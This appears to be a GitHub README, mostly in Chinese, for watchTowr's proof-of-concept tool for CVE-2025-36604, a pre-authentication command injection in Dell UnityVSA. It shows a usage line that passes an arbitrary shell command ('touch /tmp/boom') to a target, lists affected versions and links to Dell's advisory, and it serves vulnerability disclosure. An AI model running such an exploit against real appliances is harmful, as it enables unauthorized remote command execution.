watchtowrlabs/watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604

# watchTowr-vs-Dell-UnityVSA-CVE-2025-36604 Dell UnityVSA CVE-2025-36604 检测工件生成器 https://github.com/user-attachments/assets/28488a97-7845-4b78-9fe7-64b9172ab023 技术详情请参阅我们的[博客文章](https://labs.watchtowr.com/) # 检测实战 ``` python watchTowr-vs-Dell-UnityVSA-PreAuth-CVE-2025-36604.py --target https://192.168.5.45/ --command "touch /tmp/boom" __ ___ ___________ __ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________ \ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \ \ / / __ \| | \ \___| Y | |( <_> \ / | | \/ \/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__| \/ \/ \/ watchTowr-vs-Dell-UnityVSA-CVE-2025-36604.py (*) Dell UnityVSA Unauthenticated Remote Command Injection Detection Artifact Generator - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber) CVEs: [CVE-2025-36604] [+] Sent exploit to https://192.168.5.45 ``` # 描述 此脚本用于检测 Dell UnityVSA 是否受到 CVE-2025-36604 漏洞的影响。 # 受影响版本 5.5.1 之前的版本受到此问题影响 欲了解更多信息，请访问 [Dell UnityVSA 安全更新说明](https://www.dell.com/support/kbdoc/en-uk/000350756/dsa-2025-281-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities) # 关注 [watchTowr](https://watchTowr.com) Labs 关注 [watchTowr](https://watchTowr.com) Labs 团队以获取最新安全研究 - https://labs.watchtowr.com/ - https://x.com/watchtowrcyber

标签：CISA项目, CVE-2025-36604, Dell UnityVSA, POC, Python, RCE, WatchTowr, 企业存储, 加密, 存储系统安全, 攻击脚本, 无后门, 概念验证, 漏洞扫描器, 网络安全, 远程代码注入, 远程命令执行, 逆向工具, 隐私保护, 预认证